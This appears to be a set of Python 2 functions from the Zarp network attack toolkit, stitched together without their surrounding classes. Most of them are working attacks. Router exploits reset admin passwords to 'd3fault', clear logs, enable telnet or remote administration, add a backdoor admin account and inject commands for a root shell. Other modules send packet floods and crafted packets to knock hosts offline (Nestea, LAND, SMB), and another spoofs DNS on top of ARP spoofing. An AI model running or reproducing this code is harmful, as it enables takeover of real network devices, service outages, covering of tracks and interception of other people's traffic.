def update(): """Run update routine """ if not util.does_file_exist('./.git/config'): util.Error( 'Not a git repo; please checkout from Github with \n\tgit clone http://github.com/hatRiot/zarp.git\n to update.' ) else: util.Msg('Updating Zarp...') ret = util.init_app('git branch -a | grep \'* dev\'', True) if len(ret) > 3: util.Error( 'You appear to be on the dev branch. Please switch off dev to update.' ) return ret = util.init_app('git pull git://github.com/hatRiot/zarp.git HEAD', True) if 'Already up-to-date' in ret: util.Msg('Zarp already up to date.') elif 'fatal' in ret: util.Error('Error updating Zarp: %s' % ret) else: from util import version util.Msg('Zarp updated to version %s' % (version()))
def initialize(self): version = util.get_input('Enter Zoom version [2/3]: ') util.Msg('Changing admin password to \'d3fault\'...') url_25 = 'http://%s/hag/emweb/PopOutUserModify.htm/FormOne&user=admin&'\ 'ex_param1=admin&new_pass1=d3fault&new_pass2=d3fault&id=3&'\ 'cmdSubmit=Save+Changes' % self.config['target'].value url_30 = 'http://%s/hag/emweb/PopOutUserModify.htm?id=40&user=admin&'\ 'Zadv=1&ex_param1=admin&new_pass1=d3fault&new_pass2=d3fault&'\ 'id=3&cmdSubmit=Save+Changes' % self.config['target'].value url_logs = 'http://%s/Action?id=76&cmdClear+Log=Clear+Log' % self.config[ 'target'].value try: if version == '2': urllib.urlopen(url_25).read() else: urllib.urlopen(url_30).read() util.Msg("Password reset, clearing logs...") urllib.urlopen(url_logs).read() util.Msg('Done. Connect to %s with admin:d3fault' % self.config['target'].value) except Exception, e: util.Error('Unable to connect: %s' % e)
def initialize(self): target = self.config['target'].value try: pkt1 = IP(dst=target, id=42, flags="MF") / UDP() / ("X" * 10) pkt2 = IP(dst=target, id=42, frag=48) / ("X" * 116) pkt3 = IP(dst=target, id=42, flags="MF") / UDP() / ("X" * 224) while True: util.Msg('DoSing %s...' % target) send(pkt1) send(pkt2) send(pkt3) if self.is_alive(): util.Msg('Host appears to still be up.') try: tmp = raw_input('[!] Try again? [Y/n] ') except Exception: break if 'n' in tmp.lower(): break else: util.Msg('Host not responding!') break except KeyboardInterrupt: return except Exception: util.Error('Error with given address. Could not complete DoS.') return
def initialize(self): # supress scapy output conf.verb = 0 try: self.target = raw_input('[!] Enter IP to DoS: ') tmp = raw_input('[!] LAND attack at ip %s. Is this correct? ' % self.target) if 'n' in tmp.lower(): return while True: print '[!] DoSing %s...' % self.target send( IP(src=self.target, dst=self.target) / TCP(sport=134, dport=134)) if self.is_alive(): util.Msg('Host appears to still be up.') try: tmp = raw_input('[!] Try again? ') except Exception: break if 'n' in tmp.lower(): break else: util.Msg('Host not responding!') break except Exception, j: util.Error('Error: %s' % j) return
def initialize(self): """ Initialize the DoS """ try: pkt = ("\x00\x00\x00\x90" "\xff\x53\x4d\x42" "\x72\x00\x00\x00" "\x00\x18\x53\xc8" "\x00\x26" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" "\x30\x30\x32\x00") sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.get_ip() sock.connect((self.target, 445)) sock.send(pkt) sock.close() if self.is_alive(): util.Msg('Host appears to be up') else: util.Msg('Host is not responding - ' 'it is either down or rejecting our probes.') except Exception: util.Error('Remote host not susceptible to vulnerability.') return
def run(self): util.Msg( 'Changing admin password and enabling remote telnet server...') try: data = urlencode({ 'productid': 'RT-N56U', 'current_page': 'Advanced_System_Content.asp', 'next_page': '', 'next_host': '', 'sid_list': 'LANHostConfig%3BGeneral%3B', 'group_id': '', 'modified': '0', 'action_mode': '+Apply+', 'first_time': '', 'action_script': '', 'preferred_lang': 'EN', 'wl_ssid2': 'wat', 'firmver': '1.0.7f', 'http_passwd': 'd3fault', 'http_passwd2': 'd3fault', 'v_password2': 'd3fault', 'log_ipaddr': '', 'time_zone': 'UCT12', 'ntp_server0': 'pool.ntp.org', 'telnetd': '1' }) response = urlopen("http://%s/start_apply.htm" % self.ip, data).read() if "You cannot Login unless logout another user first" in response: util.Msg("Another user is logged in, attempt to logout? [y] ") util.Msg('Done. telnet into %s with \'admin:d3fault\'' % self.ip) except Exception, e: util.Error('Error: %s' % e)
def initialize(self): # shut scapy up conf.verb = 0 try: self.target = raw_input('[!] Enter IP address to DoS: ') tmp = raw_input('[!] Nestea DoS IP %s. Is this correct? ' % self.target) if 'n' in tmp.lower(): return while True: util.Msg('DoSing %s...' % self.target) send( IP(dst=self.target, id=42, flags="MF") / UDP() / ("X" * 10)) send(IP(dst=self.target, id=42, frag=48) / ("X" * 116)) send( IP(dst=self.target, id=42, flags="MF") / UDP() / ("X" * 224)) if self.is_alive(): util.Msg('Host appears to still be up.') try: tmp = raw_input('[!] Try again? ') except Exception: break if 'n' in tmp.lower(): break else: util.Msg('Host not responding!') break except Exception, j: util.Error('Error with given address. Could not complete DoS.') return
def parse(sysv, loader): """ Modules can set their own CLI options. Right now we only load services and scanners, as these represent a majority of the 'typical' use case for something you want to pull off quickly. loader is a Loader object with all loaded modules. """ parser = argparse.ArgumentParser(description=util.header()) # add standard options parser.add_argument('-q', help='Generic network sniff', action='store', dest='filter') parser.add_argument('--update', help='Update Zarp', action='store_true', default=False, dest='update') service_group = parser.add_argument_group('Services') scanner_group = parser.add_argument_group('Scanners') # iterate through loaded modules and build the argument parser for service in loader.services: if hasattr(service, 'cli'): service().cli(service_group) for scanner in loader.scanner: if hasattr(scanner, 'cli'): scanner().cli(scanner_group) options = parser.parse_args() option_dict = options.__dict__ # first handle standard options if options.filter: util.Msg("Sniffing with filter [%s]...(ctrl^c to exit)" % options.filter) try: sniff(filter=options.filter, store=0, prn=lambda x: x.summary()) except Exception: util.Msg("Exiting sniffer..") except Scapy_Exception as msg: util.Error(msg) sys.exit(1) elif options.update: update() sys.exit(1) # we can only launch one module at a time, so grab the first usr_mod = [x for x in option_dict.keys() if option_dict[x] is True][0] # see what it is if usr_mod in [x().which for x in loader.services]: module = [x for x in loader.services if x().which == usr_mod][0] util.Msg('Starting %s...' % module().which) mod = module() mod.dump_data = True mod.initialize() elif usr_mod in [x().which for x in loader.scanner]: module = [x for x in loader.scanner if x().which == usr_mod][0] module().initialize() sys.exit(1)
def initialize(self): """Initialize the DNS spoofer. This is dependent on a running ARP spoof; for now! """ try: arps = None key = None if 'ARP Spoof' in stream.HOUSE: house = stream.HOUSE['ARP Spoof'] else: util.Error('ARP spoof required!') return while True: stream.dump_module_sessions('ARP Spoof') try: num = int(raw_input('[number] > ')) except TypeError: continue if len(house.keys()) > num: key = house.keys()[num] arps = house[key] self.source = arps.victim[0] self.local_mac = arps.local[1] break else: return dns_name = raw_input('[!] Enter regex to match DNS:\t') if dns_name in self.dns_spoofed_pair: util.Msg('DNS is already being spoofed (%s).' % (self.dns_spoofed_pair[dns_name])) return dns_spoofed = raw_input('[!] Spoof DNS entry matching %s to:\t' % (dns_name)) tmp = raw_input( '[!] Spoof DNS record \'%s\' to \'%s\'. Is this correct?' % (dns_name, dns_spoofed)) if 'n' in tmp.lower(): return dns_name = re.compile(dns_name) self.dns_spoofed_pair[dns_name] = dns_spoofed self.running = True util.Msg('Starting DNS spoofer...') thread = Thread(target=self.dns_sniffer) thread.start() except KeyboardInterrupt: return None except re.error: util.Error('Invalid regex given.') return None except Exception, j: util.Error('Error: %s' % j) return None
def shutdown(self): util.Msg('Shutting %s service down..' % self.which) if self.running: self.running = False if self.log_data: self.log(False, None) util.Msg("%s shutdown." % self.which) util.debug('%s shutdown.' % self.which)
def initialize(self): util.Msg('Fetching config from %s...' % self.config['target'].value) url = 'http://%s/config.bin' % self.config['target'].value try: response = urllib.urlopen(url).read() util.Msg(response) except Exception, e: util.Error('Error: %s' % e)
def run(self): util.Msg('Fetching config from %s...' % self.ip) url = 'http://%s/config.bin' % self.ip try: response = urllib.urlopen(url).read() util.Msg(response) except Exception, e: util.Error('Error: %s' % e)
def run(self): util.Msg('Changing admin password to \'d3fault\'...') try: url = 'http://%s/redpass.cgi?sysPassword=d3fault&change=1' % self.ip response = urllib.urlopen(url).read() util.Msg('Done. Admin password changed to \'d3fault\'') except Exception, e: util.Error('Error: %s' % e) return
def shutdown(self): """ Shut down the module cleanly """ util.Msg('Shutting \'%s\' down..' % self.which) if self.running: self.running = False if self.log_data: self.log(False) util.Msg("%s shutdown." % self.which) util.debug('%s shutdown.' % self.which)
def run(self): url = 'http://%s/level/'%(self.ip) for idx in range(16, 100): url += str(idx) + '/exec/-' response = urllib.urlopen(url).read() if '200 ok' in response.lower(): util.Msg('Device vulnerable. Connect to %s for admin'%(self.ip)) return util.Msg('Device not vulnerable.') return
def initialize(self): util.Msg('Changing admin password to \'d3fault\'...') try: url = 'http://%s/redpass.cgi?sysPassword=d3fault&change=1' \ % self.config['target'].value urllib.urlopen(url).read() util.Msg('Done. Admin password changed to \'d3fault\'') except Exception, e: util.Error('Error: %s' % e) return
def initialize(self): util.Msg("Starting redirect_port...") self.modip() self.running = True util.Msg("Redirection to from TCP port {0} to {1}...".format(self.config['source_port'].value, self.config['dest_port'].value)) return True
def run(self): util.Msg('Adding admin \'adm4n\' with password \'d3fault\'') url = 'http://%s/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0'%self.ip params = urllib.urlencode({'ACTION_POST':1, 'admin_name':'adm4n','admin_password':'******', 'admin_password2':'d3fault'}) try: response = urllib.urlopen(url,params).read() util.Msg('Done. Connect to %s with \'adm4n:d3fault\'' % self.ip) except Exception, e: util.Error('Failed: %s' % e) return
def initialize(self): url = 'http://%s/level/' % (self.config['target'].value) for idx in range(16, 100): url += str(idx) + '/exec/-' response = urllib.urlopen(url).read() if '200 ok' in response.lower(): util.Msg('Device vulnerable. Connect to %s for admin' % (self.config['target'].value)) return util.Msg('Device not vulnerable.') return
def view(self): """Overridden Sniffer view since we just need to dump info out """ if len(self.netmap) <= 0: util.Msg("No hosts yet mapped.") else: for address in self.netmap.keys(): print '\t%s\t%s\t%s'%(self.netmap[address].ip,self.netmap[address].mac, self.netmap[address].host) util.Msg('\t %s hosts found.'%len(self.netmap))
def run(self): util.Msg('Resetting admin password to \'d3fault\'...') try: url = 'http://%s/manage.tri?remote_mg_https=0&http_enable=1&https_enable=0' \ '&PasswdModify=1&http_passwd=d3fault&http_passwdConfirm=d3fault' \ '&_http_enable=1&web_wl_filter=1&remote_management=0&upnp=_enable=1'\ '&layout=en' % self.ip urllib.urlopen(url).read() util.Msg('Done') except Exception, e: util.Error('Error: %s' % e) return
def run(self): util.Msg('Changing admin password to \'d3fault\' ' 'and enabling remote admin on port 8080...') try: url = 'http://%s/tools_admin.cgi?admname=admin&admPass1=d3fault' \ '&admPass2=d3fault&username=admin&userPass1=d3fault&userPass2=d3fault' \ '&hip1=*&hport=8080&hEnable=1' % self.ip urllib.urlopen(url).read() util.Msg('Admin password changed to \'d3fault\' ' 'and interface enabled on 8080') except Exception, e: util.Error('Error: %s' % e)
def initialize(self): util.Msg('Fetching password from %s...' % self.config['target'].value) url = 'http://%s/router-info.htm' % self.config['target'].value url2 = 'http://%s/cgi-bin/router-info.htm' % self.config['target'].value try: response = urllib.urlopen(url).read() response2 = urllib.urlopen(url2).read() util.Msg('First:') print '\t' + response util.Msg('Second:') print '\t' + response2 except Exception, e: util.Error('Error: %s' % e)
def run(self): try: util.Msg('Executing command injection on %s...' % self.ip) sock = socket.socket() sock.connect((self.ip, 8000)) sock.sendall(self.inject) time.sleep(3) util.Msg('Forcing the device to save...') sock.sendall(self.hard_save) sock.close() util.Msg('Reboot router for root shell on %s:5555' % (self.ip)) except Exception, e: util.Error('Error: %s' % e)
def run(self): util.Msg('Fetching password from %s...' % self.ip) url = 'http://%s/router-info.htm' % self.ip url2 = 'http://%s/cgi-bin/router-info.htm' % self.ip try: response = urllib.urlopen(url).read() response2 = urllib.urlopen(url2).read() util.Msg('First:') print '\t' + response util.Msg('Second:') print '\t' + response2 except Exception, e: util.Error('Error: %s' % e)
def run(self): util.Msg( 'Changing admin password and enabling remote telnet server...') try: url = 'http://%s/start_apply.htm?productid=RT-N56U¤t_page=Advanced_System_Content.asp' \ '&next_page=&next_host=&sid_list=LANHostConfig%3BGeneral%3B&group_id=&modified=0' \ '&action_mode=+Apply+&first_time=&action_script=&preferred_lang=EN&wl_ssid2=wat'\ '&firmver=1.0.7f&http_passwd=d3fault&http_passwd2=d3fault&v_password2=d3fault' \ '&log_ipaddr=&time_zone=UCT12&ntp_server0=pool.ntp.org&telnetd=1'%self.ip response = urllib.urlopen(url).read() util.Msg('Done. telnet into %s with \'admin:d3fault\'' % self.ip) except Exception, e: util.Error('Error: %s' % e)
def view(self): """ Used to enter a state of 'focus'; i.e. the user wants to see status updates, informational messages, etc. """ try: util.Msg('[enter] when finished') util.Msg('Dumping output from \'%s\'...' % self.which) self.dump_data = True raw_input() self.dump_data = False except KeyboardInterrupt: self.dump_data = False return
def initialize(self): try: util.Msg('Executing command injection on %s...' % self.config['target'].value) sock = socket.socket() sock.connect((self.config['target'].value, 8000)) sock.sendall(self.inject) sleep(3) util.Msg('Forcing the device to save...') sock.sendall(self.hard_save) sock.close() util.Msg('Reboot router for root shell on %s:5555' % (self.config['target'].value)) except Exception, e: util.Error('Error: %s' % e)
def initialize(self): try: if not util.check_program('airmon-ng'): util.Error( 'airomon-ng not installed. Please install to continue.') return False util.Msg('(ctrl^c) when finished.') iface = util.get_monitor_adapter() if iface is None: util.Msg('No devices found in monitor mode. Enabling...') iface = util.enable_monitor(self.channel) util.debug('Using interface %s' % iface) self.ap_scan(iface) except Exception, KeyboardInterrupt: return
def initialize(self): """initialize the NUD dos""" util.Msg('Starting NUD DoS listener...') self.running = True dthread = Thread(target=self.listener) dthread.start() return 'NuD DoS Listener'